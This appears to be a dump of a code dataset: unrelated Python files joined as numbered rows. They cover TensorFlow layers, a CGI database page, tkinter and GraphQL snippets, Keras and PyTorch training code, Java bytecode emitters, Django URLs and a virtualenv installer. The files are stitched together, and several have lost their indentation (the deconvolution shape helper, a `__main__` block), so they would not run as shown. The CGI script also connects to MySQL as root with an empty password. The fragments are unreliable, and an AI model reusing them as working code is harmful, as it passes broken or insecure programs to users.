        pads = [(0, 0)] + [(pad, pad)] * nd + [(0, 0)]
        x = tf.pad(x, pads, mode='CONSTANT')
    kernel = _kernel_shape(nd, kernel, x.dims[-1], outdim)
    W = tf.get_weight('W', shape=kernel, initializer=initializer(kernel), **kwargs)
    if nd == 1:
        out = _atrous1d(x, W, rate, padding=padding)
    elif nd == 2:
        out = tf.nn.atrous_conv2d(x, W, rate, padding)
    else:
        raise NotImplementedError('not implementd for ndim [{0}]'.format(nd))
    if bias is not None:
        b = tf.get_bias('b', shape=(outdim,), initializer=tf.zeros_initializer(), **kwargs)
        out = tf.nn.bias_add(out, b)
    return out
# endregion
# region deconv
def _deconv_outshape(nd, inshape, outdim, kernel, stride, padding, extra_shape=0):
# conv2d case (filter = kernel)
# output = (input + stride - 1)//stride # SAME ? filter?
# output = (input + stride - filter)//stride # VALID
# 위 식 inverse
# output = (input * stride) - stride + 1 + extra
# todo : through check need ??
# => max일경우 (output - 1) * stride + 1 - stride
# output = (input * stride) - stride + filter + extra # VALID
# 단, 0 <= extra < stride
if isinstance(kernel, int):
kernel = [kernel] * nd
if isinstance(stride, int):
stride = [stride] * nd
if extra_shape is None:
extra_shape = 0
if isinstance(extra_shape, int):
extra_shape = [extra_shape] * nd
outshape = [None] * nd
if padding == 'SAME':
for i in range(0, nd):
outshape[i] = inshape[i+1] * stride[i] + extra_shape[0]
elif padding == 'VALID':
# assert -stride[0] < extra_shape[0] < stride[0]
# assert -stride[1] < extra_shape[1] < stride[1]
for i in range(0, nd):
outshape[i] = (inshape[i+1] * stride[i]) - stride[i] + kernel[i] + extra_shape[i]
else:
raise ValueError('unknown padding option {0}'.format(padding))
return [inshape[0]] + outshape + [outdim]
@layer
def deconv(x, outdim, kernel, stride=1, padding='SAME',
           initializer=tf.he_uniform, bias=False, extra=None, **kwargs):
    """
    Transposed ("de-") convolution for 2 or 3 spatial dimensions.

    :param x: input tensor, channels-last
    :param outdim: output channel count
    :param kernel: spatial kernel size
    :param stride: upsampling stride
    :param extra: extra output size per axis (see ``_deconv_outshape``)
    :param bias: add a bias term when True
    """
    nd = x.ndim - 2
    out_shape = _deconv_outshape(nd, x.dims, outdim, kernel, stride, padding, extra)
    # remember the static shape to re-attach after the op
    oshape = tf.TensorShape(out_shape)
    if out_shape[0] is None:
        # dynamic batch: take it from the runtime shape of x
        out_shape[0] = tf.shape(x)[0]
        out_shape = tf.stack(out_shape)
    kernel_shape = _kernel_shape(nd, kernel, outdim, x.dims[-1])  # swap in and out channel
    stride = _stride_shape(nd, stride)  # stride
    W = tf.get_weight('W', shape=kernel_shape, initializer=initializer(kernel_shape))
    if nd == 2:
        out = tf.nn.conv2d_transpose(x, W, out_shape, strides=stride, padding=padding)
    elif nd == 3:
        out = tf.nn.conv3d_transpose(x, W, out_shape, strides=stride, padding=padding)
    else:
        raise NotImplementedError('not implementd for ndim [{0}]'.format(nd))
    if bias:
        b = tf.get_bias('b', shape=(outdim,), initializer=tf.zeros_initializer(), **kwargs)
        out = tf.nn.bias_add(out, b)
    out.set_shape(oshape)
    return out
# endregion
# region depthwise
@layer
def dwconv(x, kernel, multiplier=1, stride=1, pad=0, padding='SAME',
           initializer=tf.he_uniform, bias=False, **kwargs):
    """
    Depthwise 2-D convolution: each input channel is convolved with its own
    ``multiplier`` filters, producing C * multiplier output channels.

    :param pad: symmetric constant padding applied before convolving
    :param bias: add a bias term when True
    """
    if pad:
        pads = [(0, 0), (pad, pad), (pad, pad), (0, 0)]
        x = tf.pad(x, pads, mode='CONSTANT')
    kernel = _kernel_shape(2, kernel, x.dims[-1], multiplier)
    stride = _stride_shape(2, stride)
    W = tf.get_weight('W', shape=kernel, initializer=initializer(kernel), **kwargs)
    out = tf.nn.depthwise_conv2d(x, W, stride, padding)
    if bias:
        # output channel count is in_channels * multiplier
        outdim = kernel[2] * multiplier
        b = tf.get_bias('b', shape=(outdim,), initializer=tf.zeros_initializer(), **kwargs)
        out = tf.nn.bias_add(out, b)
    return out
# endregion
# region subpixel
@layer
def subpixel(x, kernel, factor=2, stride=1, pad=0, padding='SAME',
             initializer=tf.he_uniform, bias=False, **kwargs):
    """
    Sub-pixel convolution: convolve to ``C * factor**2`` channels, then
    periodic-shuffle channels into space to upscale by ``factor``.

    :param x: 4D input tensor
    :param factor: spatial upscale factor per axis
    """
    from .ireshape import channel_to_space
    assert x.ndim == 4  # implemented for 4D tensor
    indim = x.dims[-1]
    outdim = indim * factor * factor
    kernel = _kernel_shape(2, kernel, indim, outdim)
    stride = _stride_shape(2, stride)
    W = tf.get_weight('W', shape=kernel, initializer=initializer(kernel))
    out = tf.nn.conv2d(x, W, stride, padding=padding)
    if bias:
        b = tf.get_bias('b', shape=(outdim,), initializer=tf.zeros_initializer())
        out = tf.nn.bias_add(out, b)
    # periodic shuffle
    out = channel_to_space(out, factor)
    return out
# endregion
# region activation
@layer
def leaky(x, slope=0.01, name=None):
    """
    leaky_relu: elementwise max(x, slope * x)
    see also pleaky (learned slope)
    :param x:
    :param slope: negative-side slope, 0.01 default
    :return:
    """
    return tf.maximum(x, x*slope, name=name)
@layer
def pleaky(x):
    """
    Parametric leaky ReLU: the negative-side slope ``alpha`` is a learned
    scalar, initialized to 0.01.
    :param x:
    :return:
    """
    alpha = tf.get_bias('alpha', shape=(), initializer=tf.constant_initializer(0.01))
    return tf.maximum(x, x * alpha)
# endregion
# region resize images
@layer
def sizeup(x, factor=(2, 2), extras=(0, 0), method=ResizeMethod.NEAREST_NEIGHBOR, align_corners=False):
    """Resize images up by integer ``factor`` (plus ``extras`` pixels) per spatial axis."""
    inshape = x.dims
    if isinstance(factor, int):
        factor = (factor, factor)
    if isinstance(extras, int):
        extras = (extras, extras)
    hw = [inshape[1] * factor[0] + extras[0], inshape[2] * factor[1] + extras[1]]
    return tf.image.resize_images(x, hw, method=method, align_corners=align_corners)
@layer
def sizedown(x, factors=(2, 2), extras=(0, 0), method=ResizeMethod.NEAREST_NEIGHBOR, align_corners=False):
    """Resize images down by integer ``factors`` (plus ``extras`` pixels) per spatial axis."""
    inshape = x.dims
    if isinstance(factors, int):
        factors = (factors, factors)
    if isinstance(extras, int):
        extras = (extras, extras)
    hw = [inshape[1] // factors[0] + extras[0], inshape[2] // factors[1] + extras[1]]
    return tf.image.resize_images(x, hw, method=method, align_corners=align_corners)
# endregion
# region collecting utils
@layer
def keep(t, keepto, collection=None):
    """
    append to list and return t as is
    :param t: tensor
    :param keepto: list collecting intermediate tensors
    :param collection: optional graph collection to also register ``t`` in
    :return: ``t`` unchanged
    """
    if collection is not None:
        tf.add_to_collection(collection, t)
    keepto.append(t)
    return t
@layer
def collect(t, collection='activation'):
    """
    append to a graph collection and return t as is
    :param t: tensor
    :param collection: collection name
    :return: ``t`` unchanged
    """
    tf.add_to_collection(collection, t)
    return t
# endregion
# region util
@layer
def iname(t, name):
    """Attach ``name`` to ``t`` via tf.identity (renaming helper)."""
    return tf.identity(t, name=name)
# endregion
|
5,132 | b5fee01582a28085983c56b9c266ef7fd5c3c927 | #!/usr/bin/env python
import cgitb
import cgi
import pymysql

# Show tracebacks in the browser while debugging CGI errors.
cgitb.enable()

form = cgi.FieldStorage()

# BUG FIX: the original called c.execute() on an undefined cursor -- no
# connection was ever opened.  TODO(review): fill in the real credentials.
conn = pymysql.connect(host="localhost", user="root", password="", db="test")
c = conn.cursor()
c.execute("SELECT * FROM example")
recs = c.fetchall()
conn.close()

# Static opening fragment of the page.
records1 = """
<body>
<table>
<tbody>
<tr>
<th>Full Name</th>
<th>Average Score</th>
</tr>"""

# BUG FIX: the original loop target ``for recs[1], recs[2] in recs``
# overwrote the result set and referenced undefined names (name, avg).
# Each row is unpacked positionally: column 1 = name, column 2 = average.
records_dyn = [
    f"<tr><td>{rec[1]}</td><td>{rec[2]}</td></tr>" for rec in recs]

# Closing fragment: end the table before closing the body.
records2 = """
</tbody>
</table>
<form method="POST" action="index.py">
<input type="submit" value="Go Back">
</form>
</body>
</html>"""

print("Content-Type:text/html; charset=utf-8")
print()
for i in records1.split("\n"):
    print(i)
for i in records_dyn:
    print(i)
# BUG FIX: print the closing fragment; the original re-printed the opening
# fragment (records1) a second time and never emitted records2.
for i in records2.split("\n"):
    print(i)
|
5,133 | 1482c8276f9cfc912293356d04e08307edf6d367 | import tkinter as tk
import cnt_script as sW
import key_script as kW
import text_script as tW
class MainWindow(tk.Tk):
    """Launcher window with one button per counting tool.

    A reference to each open sub-window is tracked so repeated button
    clicks cannot spawn duplicates; the close_* methods are called back
    by the sub-windows to release those references.
    """

    def __init__(self):
        super().__init__()
        self.title("Main Window")
        self.geometry("600x400+30+30")
        tk.Button(self, text="Count Tags", command=self.new_tags).pack()
        tk.Button(self, text="Count keywords", command=self.new_keys).pack()
        tk.Button(self, text="Count text", command=self.new_text).pack()
        # One slot per tool window; None means "not currently open".
        self._second_window = None
        self._third_window = None
        self._text_window = None

    def new_tags(self):
        """Open the tag-counting window (no-op when one is already open)."""
        if self._second_window is None:
            self._second_window = sW.SubWindow(self)

    def new_keys(self):
        """Open the keyword-counting window (no-op when one is already open)."""
        if self._third_window is None:
            self._third_window = kW.SubWindow(self)

    def new_text(self):
        """Open the text-counting window (no-op when one is already open)."""
        if self._text_window is None:
            self._text_window = tW.SubWindow(self)

    def close(self):
        """Destroy the tag-counting window and clear its slot."""
        window, self._second_window = self._second_window, None
        if window is not None:
            window.destroy()

    def close_key(self):
        """Destroy the keyword-counting window and clear its slot."""
        window, self._third_window = self._third_window, None
        if window is not None:
            window.destroy()

    def close_text(self):
        """Destroy the text-counting window and clear its slot."""
        window, self._text_window = self._text_window, None
        if window is not None:
            window.destroy()
if __name__ == '__main__':
window = MainWindow()
window.mainloop() |
5,134 | 0992297ffc19b1bc4dc3d5e8a75307009c837032 | import strawberry as stb
from app.crud import cruduser
from app.db import get_session
@stb.type
class Query:
    """Root GraphQL query type."""

    @stb.field
    async def ReadUser(self, info, username: str):
        """Resolve a single user by ``username``.

        The first selection of the first field node is forwarded to the
        CRUD layer -- presumably so it can limit the columns it fetches;
        verify against the GraphQL schema.
        """
        ses = await get_session()
        fields = info.field_nodes[0].selection_set.selections[0]
        return await cruduser.get_user(ses, username, fields)
|
5,135 | 0dea8675d8050a91c284a13bcbce6fd0943b604e | import pandas as pd
import numpy as np
class LabeledArray:
    """Helpers for working with parallel data/label arrays."""

    @staticmethod
    def get_label_for_indexes_upto(input_data, input_label, input_index):
        """Return the labels of the ``input_index`` smallest data values.

        Data and labels are paired positionally, ordered by ascending data
        value, and the first ``input_index`` labels are returned as a
        numpy array.
        """
        combined = pd.concat(
            [pd.DataFrame(input_data), pd.DataFrame(input_label)], axis=1)
        combined.columns = ['input_data', 'input_label']
        ordered = combined.sort_values(by=['input_data'], ascending=True)
        return np.array(ordered['input_label'].head(input_index))
|
5,136 | 043ea0efd490522de4f6ee4913c8d66029b34ff5 | # =============================================================================
# Created By : Mohsen Malmir
# Created Date: Fri Nov 09 8:10 PM EST 2018
# Purpose : this file implements the gui handling to interact with emulators
# =============================================================================
from AppKit import NSWorkspace,NSApplicationActivateIgnoringOtherApps
from Quartz import CGWindowListCopyWindowInfo,kCGWindowListOptionOnScreenOnly
from Quartz import kCGWindowListExcludeDesktopElements,kCGNullWindowID
# this is a list of pairs of (emulator, game) that is supported to interact with
supported_emus = ["OpenEmu"]
supported_games = ["Mortal Kombat 3"]
def activate_emu():
    """
    Scan open windows for the first supported (emulator, game) pair, bring
    that emulator to the foreground, and return its window geometry.

    Args:
        None
    Returns:
        ([x, y, width, height], emulator_name, game_name) on success,
        None when no supported emulator/game window is found.
    """
    # get a list of all open windows
    # BUG FIX: CGWindowListOption values are bit flags and must be combined
    # with bitwise OR; the original AND-ed them, which evaluates to 0
    # (kCGWindowListOptionAll) and silently ignored both options.
    windows = CGWindowListCopyWindowInfo(
        kCGWindowListOptionOnScreenOnly | kCGWindowListExcludeDesktopElements,
        kCGNullWindowID)
    winname_list = [w.get("kCGWindowName", u"Unknown") for w in windows]
    winrect_list = [w["kCGWindowBounds"] for w in windows]
    # first find the Emulator among the running applications
    ws = NSWorkspace.sharedWorkspace()
    runningApps = ws.runningApplications()
    # the running processes are checked by their localized name, e.g. "OpenEmu"
    ra_names = [ra.localizedName() for ra in runningApps]
    for ii, emu in enumerate(supported_emus):
        if emu in ra_names:  # if a supported emu is found, check for corresponding games
            if supported_games[ii] in winname_list:  # found a supported game of the target emu
                # activate the emu window
                emu_idx = ra_names.index(emu)
                runningApps[emu_idx].activateWithOptions_(NSApplicationActivateIgnoringOtherApps)
                # get the window coordinates
                idx = winname_list.index(supported_games[ii])
                rect = winrect_list[idx]
                rect = [rect.get("X"), rect.get("Y"), rect.get("Width"), rect.get("Height")]
                rect = list(map(int, rect))
                return rect, emu, supported_games[ii]
    return None
if __name__ == "__main__":
print(activate_emu())
|
5,137 | 7435aa6cd4eec5582be9f4a1dd75b0dfcadc4409 | from flask_socketio import SocketIO
socket = SocketIO()


@socket.on('test')
def on_test(msg):
    """Handle the 'test' socket.io event by logging that a message arrived.

    :param msg: event payload (unused)
    """
    # BUG FIX: Python-2-only ``print`` statement replaced with a print()
    # call, which behaves the same on Python 2 and 3 for a single argument.
    print('got message')
5,138 | 47cf3045f2fa0f69759e09b1599e4afe953c06d8 | INITIAL_B = 0.15062677711161448
B_FACTOR = 5.0
INITIAL_GE = 0.22581915788215678
GE_BOUNDS = [1.0 / 10.0, 1.0 / 4.0]
FIXED_P = 0.9401234488501574
INITIAL_GU = 0.2145066414796447
GU_BOUNDS = [1.0 / 15.0, 1.0 / 2.0]
INITIAL_GI = 0.19235137989123863
GI_BOUNDS = [1.0 / 15.0, 1.0 / 5.0]
INITIAL_GH = 0.044937075878220795
GH_BOUNDS = [1.0 / 20.0, 1.0 / 5.0]
INITIAL_MU = 0.002840331041978459
MU_BOUNDS = [0.0, 0.1]
INITIAL_PARAMETERS = [
INITIAL_B,
INITIAL_GE,
FIXED_P,
INITIAL_GU,
INITIAL_GI,
INITIAL_GH,
None, # rH
INITIAL_MU,
]
E_FACTOR = 5.0
U_FACTOR = 5.0
I_FACTOR = 5.0
|
5,139 | 461b2de86907047df53c3857c6b0397e77de3fcd | import keras
from keras.applications import VGG16
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Model
import matplotlib.pyplot as plt
from keras.callbacks import History
import numpy as np
import os
import cPickle as pickle
import scipy
from scipy import spatial
def getModel( output_dim ):
    '''
    Build a transfer-learning regression model on top of ImageNet VGG16.

    The VGG16 base is frozen; a single dense layer maps the last FC
    activation to an embedding vector, trained with cosine proximity loss.

    * output_dim: size of the regression target, e.g. 300 for word2vec (int)
    * return: compiled model (keras.engine.training.Model)
    '''
    vgg_model = VGG16( weights='imagenet', include_top=True )
    vgg_out = vgg_model.layers[-2].output #Last FC layer's output
    # Regression head mapping vgg_out to the embedding space
    # (not a softmax -- the loss below is cosine proximity).
    regression_layer = keras.layers.core.Dense(output_dim,
                        init='lecun_uniform')(vgg_out)
    #Create new transfer learning model
    tl_model = Model( input=vgg_model.input, output=regression_layer)
    #Freeze all layers of VGG16 and Compile the model
    for layers in vgg_model.layers:
        layers.trainable = False;
    tl_model.compile(optimizer='Nadam',
                    loss='cosine_proximity')
    #Confirm the model is appropriate
    tl_model.summary()
    return tl_model
if __name__ == '__main__':
    # NOTE(review): Python 2 script (cPickle import at the top of the file).
    #Output dim for your dataset
    output_dim = 300 #For word2vec output
    # Training parameters
    batchSize = 100
    numEpochs = 15
    tl_model = getModel( output_dim )
    # Pre-computed class ids, word-embedding targets and validation tensors.
    trainClass = np.load('caltech250TrainClass.npy')
    trainLabel = np.load('caltech250TrainWordvec.npy')
    valData = np.load('caltech250ValData.npy')
    valClass = np.load('caltech250ValClass.npy')
    valLabel = np.load('caltech250ValWordvec.npy')
    # Input data generator
    train_datagen = ImageDataGenerator(
        featurewise_center = True)
    train_generator = train_datagen.flow_from_directory(
        'resizedCaltech250Train',
        target_size= (224,224),
        class_mode = 'sparse',
        batch_size = batchSize)
    test_datagen = ImageDataGenerator(
        featurewise_center = True)
    test_generator = test_datagen.flow_from_directory(
        'resizedCaltech250Val',
        target_size=(224,224),
        class_mode = 'sparse',
        batch_size = batchSize)
    # Fit the featurewise statistics on the validation tensor.
    train_datagen.fit(valData)
    test_datagen.fit(valData)
    caltechDict = pickle.load(open('caltech256Dict.pkl'))
    epoch = 0
    numImg = 0
    numImgsPerEpoch = 23954
    # Sort class labels and reorder the embedding targets to match.
    classLabels = os.listdir('./resizedCaltech250Train/')
    classTargets = [caltechDict[key] for key in caltechDict]
    classLabels = [key for key in caltechDict]
    ind = np.argsort(classLabels)
    classLabels.sort()
    classTargets = [classTargets[i] for i in ind]
    print("Epoch 0")
    batchCount = 0
    for batch in train_generator:
        imgs = batch[0]
        labels = batch[1]
        # Look up the word-embedding target for each sparse class id.
        wordEmbed = [np.asarray(caltechDict[classLabels[classInd]]) for classInd in labels]
        tl_model.train_on_batch(imgs,np.asarray(wordEmbed))
        #print(batchCount)
        numImg += batchSize
        batchCount += 1
        # Epoch checkpoint
        if numImg > numImgsPerEpoch:
            tl_model.save('test.hd5')
            epoch += 1
            numImg = 0
            print('Epoch: ' + str(epoch))
            # Calculate validation loss after each epoch
            loss = 0
            imgCount = 0
            numbatch = 1
            print("Calculating validation loss")
            # Get validation set labels from cosine similarity
            predictions = tl_model.predict(valData, batch_size = 100, verbose = 1)
            #print('Validation Loss: ' + str(spatial.distance.cosine(predictions,valLabel)))
            valLoss = [spatial.distance.cosine(predictions[j,:],valLabel[j,:]) for j in range(valClass.shape[0])]
            print('Validation Loss: ' + str(sum(valLoss)/valClass.shape[0]))
            # Nearest class target (by cosine distance) is the prediction.
            dist = [[spatial.distance.cosine(x,y) for y in classTargets] for x in predictions]
            ind = np.argmin(dist,1)
            predictedLabel = [classLabels[x] for x in ind]
            # Calculate error rate
            correct = 0
            for i,label in enumerate(valClass):
                if valClass[i] == predictedLabel[i]:
                    correct += 1
            print('Validation Accuracy: ' + str(float(correct)/valClass.shape[0]))
            print("Calculating Training Accuracy and Loss")
            t_preds = np.array([])
            t_targets = np.array([])
            t_numImg = 0
            t_batch_count = 1
            # Run one extra pass over the training generator to score it.
            for t_batch in train_generator:
                #print(' train batch ' + str(t_batch_count))
                t_numImg += batchSize
                t_imgs = t_batch[0]
                t_batch_preds = tl_model.predict_on_batch(t_imgs)
                t_batch_targets = t_batch[1]
                #print(classLabels[t_batch_targets[0]])
                t_preds = np.vstack([t_preds, t_batch_preds]) if t_preds.size else t_batch_preds
                t_targets = np.hstack([t_targets, t_batch_targets]) if t_targets.size else t_batch_targets
                #print(' size ' + str(np.shape(t_targets)))
                t_batch_count += 1
                if t_numImg >= numImgsPerEpoch:
                    break
            dist = [[spatial.distance.cosine(x,y) for y in classTargets] for x in t_preds]
            ind = np.argmin(dist,1)
            predictedLabel = [classLabels[x] for x in ind]
            # Calculate Training Accuracy
            correct = 0
            #for i,label in enumerate(trainClass):
            for i in range(numImgsPerEpoch):
                #if trainClass[i] == predictedLabel[i]:
                if classLabels[t_targets[i]] == predictedLabel[i]:
                    correct += 1
            print('Training Accuracy: ' + str(float(correct)/trainClass.shape[0]))
            trainLoss = [spatial.distance.cosine(t_preds[sample,:],trainLabel[sample,:]) for sample in range(trainClass.shape[0])]
            print('Training Loss: ' + str(sum(trainLoss)/trainClass.shape[0]))
            '''
            for valBatch in test_generator:
                imgs = valBatch[0]
                labels = valBatch[1]
                wordEmbed = [np.asarray(caltechDict[classLabels[classInd]]) for classInd in labels]
                loss += np.sum(tl_model.test_on_batch(imgs,np.asarray(wordEmbed)))
                imgCount += batchSize
                if imgCount > 1:
                    print("Validation: " + str(loss/imgCount))
                    loss = 0
                    imgCount = 0
                    break
            '''
            if epoch >= numEpochs:
                break
    #Test the model
    '''
    plt.plot(history.history['acc'])
    plt.show()
    plt.figure()
    plt.plot(history.history['loss'])
    plt.show()
    plt.figure()
    plt.plot(history.history['val_acc'])
    plt.show()
    plt.figure()
    plt.plot(history.history['val_loss'])
    plt.show()
    epoch = 0
    numImg = 0
    classLabels = os.listdir('C:/Users/xsaardo/Desktop/Caltech97Train/')
    for batch in train_generator:
        imgs = batch[0]
        labels = batch[1]
        print(batch[0].shape)
        print(classLabels[np.argmax(batch[1][0,:])])
        img = np.reshape(batch[0][0,:,:,:],(224,224,3)).astype('uint8')
        print(img.shape)
        plt.imshow(img)
        plt.show()
        break;
        numImg += batchSize
        if numImg > numImgsPerEpoch:
            epoch += 1
            if epoch > numEpochs:
                break
    '''
|
5,140 | ba1648143d49110a163da02e60fb0fd024a10b79 | from __future__ import print_function # Should comes first than torch
import torch
from torch.autograd import Variable
##
## Autograd.Variable is the central class of the package. It wraps a Tensor, and supports nearly all of operations defined on it. Once you finish your computation you can call .backward() and have all the gradients computed automatically!!!
## from: http://pytorch.org/tutorials/beginner/blitz/autograd_tutorial.html
## ------------- Simple Variable ------------- ##
print("# ------------- Simple Variable ------------- #")
x_tensor = torch.ones(2, 2)
x = Variable(x_tensor, requires_grad=True)
print(x)
y = x + 2
print(y)
# y was created as a result of an operation, so it has a grad_fn.
print (y.grad_fn)
z = y * y * 3 # z = 3*y^2
out = z.mean()
print("z = y * y * 3\n", z, out)
## ------------- Simple Gradients ------------- ##
print("# ------------- Simple Gradients ------------- #")
# out.backward() is equivalent to doing out.backward(torch.Tensor([1.0]))
out.backward()
print("dout/dx \n", x.grad) # gradient of z = 3(x+2)^2, dout/dx = 3/2(x+2), x=1
## ------------- Crazy Gradients ------------- ##
print("# ------------- Crazy Gradients ------------- #")
x = torch.randn(3)
x = Variable(x, requires_grad=True)
y = x * 2
while y.data.norm() < 1000:
y = y * 2
print("y \n", y)
gradients = torch.FloatTensor([0.1, 1.0, 0.0001])
y.backward(gradients)
print("dy/dx \n", x.grad)
|
5,141 | 7b527f9ec66ddf35f3395d78c857c021975402c7 | from django.urls import path
from main.views import IndexView, BuiltinsView, CustomView
# URL namespace so views/templates can reverse e.g. 'main:index'.
app_name = 'main'
# One route per class-based view.
urlpatterns = [
    path('', IndexView.as_view(), name='index'),
    path('builtins/', BuiltinsView.as_view(), name='builtins'),
    path('custom/', CustomView.as_view(), name='custom')
]
|
5,142 | 67e0536dc9f38ab82fe30e715599fed93c5425a5 | from ...java import opcodes as JavaOpcodes
from .primitives import ICONST_val
##########################################################################
# Common Java operations
##########################################################################
class New:
    """Emit NEW + DUP for ``classname`` (two refs, ready for a later <init>)."""
    def __init__(self, classname):
        self.classname = classname

    def process(self, context):
        context.add_opcodes(
            JavaOpcodes.NEW(self.classname),
            JavaOpcodes.DUP()
        )
class Init:
    """Emit INVOKESPECIAL of ``<init>`` on ``classname`` with descriptor ``args``."""
    def __init__(self, classname, *args):
        self.classname = classname
        self.args = args

    def process(self, context):
        context.add_opcodes(
            JavaOpcodes.INVOKESPECIAL(
                self.classname,
                '<init>',
                args=self.args,
                returns='V'
            ),
        )
class Yield:
    """Emit the opcodes that make a generator yield at ``yield_point``."""
    def __init__(self, yield_point):
        self.yield_point = yield_point

    def process(self, context):
        context.add_opcodes(
            ICONST_val(self.yield_point),
            JavaOpcodes.INVOKEVIRTUAL(
                'org/python/types/Generator',
                'yield',
                args=['Ljava/util/Map;', 'I'],
                returns='V'
            ),
            # "yield" by returning from the generator method.
            JavaOpcodes.ARETURN()
        )
##########################################################################
# Java types and their operations
##########################################################################
class Array:
    """
    Emit an object array of ``size`` elements of ``classname``.

    When ``fill`` is given, every slot is initialized with the opcodes it
    produces (note: the same ``fill`` object is reused for each slot).
    """
    def __init__(self, size, classname='org/python/Object', fill=None):
        self.size = size
        self.classname = classname
        self.fill = fill

    def process(self, context):
        context.add_opcodes(
            ICONST_val(self.size),
            JavaOpcodes.ANEWARRAY(self.classname),
        )
        if self.fill:
            for i in range(self.size):
                # DUP the array ref, push index + value, store.
                context.add_opcodes(
                    JavaOpcodes.DUP(),
                    ICONST_val(i),
                    self.fill,
                    JavaOpcodes.AASTORE(),
                )
class List:
    """Emit a fresh ``java/util/ArrayList`` (optionally pre-sized)."""
    def __init__(self, size=None):
        self.size = size

    def process(self, context):
        context.add_opcodes(
            JavaOpcodes.NEW('java/util/ArrayList'),
            JavaOpcodes.DUP(),
        )
        if self.size:
            # use the capacity-taking constructor
            context.add_opcodes(
                ICONST_val(self.size),
                Init('java/util/ArrayList', 'I')
            )
        else:
            context.add_opcodes(
                Init('java/util/ArrayList')
            )

    class add:
        """Append the value on the stack to the list; drop the boolean result."""
        def process(self, context):
            context.add_opcodes(
                JavaOpcodes.INVOKEINTERFACE(
                    'java/util/List',
                    'add',
                    args=['Ljava/lang/Object;'],
                    returns='Z'
                ),
                JavaOpcodes.POP(),
            )
class Map:
    """Emit a fresh ``java/util/HashMap``; nested helpers operate on maps."""
    def process(self, context):
        context.add_opcodes(
            JavaOpcodes.NEW('java/util/HashMap'),
            JavaOpcodes.DUP(),
            Init('java/util/HashMap')
        )

    class get:
        """Look up the constant ``key`` in the map on the stack."""
        def __init__(self, key):
            self.key = key

        def process(self, context):
            context.add_opcodes(
                JavaOpcodes.LDC_W(self.key),
                JavaOpcodes.INVOKEINTERFACE(
                    'java/util/Map',
                    'get',
                    args=['Ljava/lang/Object;'],
                    returns='Ljava/lang/Object;'
                )
            )

    class put:
        """Store the (key, value) pair on the stack; discard the old value."""
        def process(self, context):
            context.add_opcodes(
                JavaOpcodes.INVOKEINTERFACE(
                    'java/util/Map',
                    'put',
                    args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],
                    returns='Ljava/lang/Object;'
                ),
                JavaOpcodes.POP()
            )

    class putAll:
        """Copy all entries of the map on the stack into the target map."""
        def process(self, context):
            context.add_opcodes(
                JavaOpcodes.INVOKEINTERFACE(
                    'java/util/Map',
                    'putAll',
                    args=['Ljava/util/Map;'],
                    returns='V'
                ),
            )
class Class:
    """Namespace for java.lang.Class opcode helpers."""
    class forName:
        """Emit ``Class.forName(classname)``."""
        def __init__(self, classname):
            self.classname = classname

        def process(self, context):
            context.add_opcodes(
                JavaOpcodes.LDC_W(self.classname),
                JavaOpcodes.INVOKESTATIC(
                    'java/lang/Class',
                    'forName',
                    args=['Ljava/lang/String;'],
                    returns='Ljava/lang/Class;'
                ),
            )
class THROW:
    """
    Raise an exception of the given type with the given arguments.

    Each argument is a (java_type_descriptor, value_opcode) pair.
    Example:
        THROW(
            'org/python/exceptions/AttributeError',
            ['Ljava/lang/String;', JavaOpcodes.LDC_W("Invalid attribute")],
        )
    """
    def __init__(self, exception_class, *exception_args):
        self.exception_class = exception_class
        # split the (type, value) pairs for the constructor call below
        self.exc_arg_types = [e[0] for e in exception_args]
        self.exc_arg_values = [e[1] for e in exception_args]

    def process(self, context):
        # NEW + DUP the exception, then push its constructor arguments...
        context.add_opcodes(
            New(self.exception_class),
            *self.exc_arg_values
        )
        # ...invoke <init> and throw the constructed exception.
        context.add_opcodes(
            Init(self.exception_class, *self.exc_arg_types),
            JavaOpcodes.ATHROW(),
        )
|
5,143 | 3f41cb1acbbb1a397ae1288bca1cbcd27c0d3f33 | # -*- coding: utf-8 -*-
import os
import subprocess
import virtualenv
from templateserver import __version__ as version
DEFAULT_TEMPLATE_DIR = 'templates'
DEFAULT_MEDIA_DIR = 'media'
DEFAULT_STATIC_DIR = 'static'
DEFAULT_ENV_DIR = '.env'
DEFAULT_RUNSERVER_PATH = 'runserver.py'
RUNSERVER_TEMPLATE = os.path.abspath(os.path.join(os.path.dirname(__file__), 'runserver_template.py'))
def install_virtualenv(envdir):
    """Create a virtualenv at ``envdir`` unless one already exists."""
    if os.path.exists(envdir):
        return
    virtualenv.create_environment(envdir, False)
def install_django(envdir, version):
    """Install the requested Django release into the virtualenv via its pip."""
    pip_path = os.path.join(envdir, 'bin', 'pip')
    subprocess.call([pip_path, 'install', 'django==%s' % version])
def install_runserver(envdir, runserverpath, templatedir, mediadir, staticdir):
    """
    Render the runserver template and write it as an executable script.

    :param envdir: virtualenv directory (its python path is baked in)
    :param runserverpath: destination path for the generated script
    :param templatedir: templates folder substituted into the script
    :param mediadir: media folder substituted into the script
    :param staticdir: static folder substituted into the script
    """
    python = os.path.join(envdir, 'bin', 'python')
    with open(RUNSERVER_TEMPLATE) as fobj:
        template = fobj.read()
    # Substitute every placeholder in a single pass over a mapping instead
    # of a long chain of .replace() calls.
    substitutions = {
        '$PYTHON$': python,
        '$MEDIADIR$': mediadir,
        '$STATICDIR$': staticdir,
        '$TEMPLATEDIR$': templatedir,
        '$VERSION$': version,
    }
    runserver = template
    for placeholder, value in substitutions.items():
        runserver = runserver.replace(placeholder, value)
    with open(runserverpath, 'w') as fobj:
        fobj.write(runserver)
    # BUG FIX: explicit octal literal 0o755 (rwxr-xr-x) -- the legacy
    # ``0755`` form is a syntax error on Python 3.
    os.chmod(runserverpath, 0o755)
def install(templatedir=DEFAULT_TEMPLATE_DIR, mediadir=DEFAULT_MEDIA_DIR,
            staticdir=DEFAULT_STATIC_DIR, runserverpath=DEFAULT_RUNSERVER_PATH,
            envdir=DEFAULT_ENV_DIR, django='1.3'):
    """
    Install the runserver.py script.

    Creates the virtualenv (if missing), installs the requested Django
    release into it, then renders the executable runserver wrapper.

    :param templatedir: folder containing the Django templates
    :param mediadir: folder containing media files
    :param staticdir: folder containing static files
    :param runserverpath: where to write the runserver script
    :param envdir: virtualenv directory
    :param django: Django version spec passed to pip
    """
    install_virtualenv(envdir)
    install_django(envdir, django)
    install_runserver(envdir, runserverpath, templatedir, mediadir, staticdir)
def main():
    """Command-line entry point: parse options and run :func:`install`."""
    import argparse

    def directory(s):
        # argparse type helper resolving to an absolute, existing directory.
        # NOTE(review): currently unused by the options below; kept for
        # backward compatibility.
        path = os.path.abspath(s)
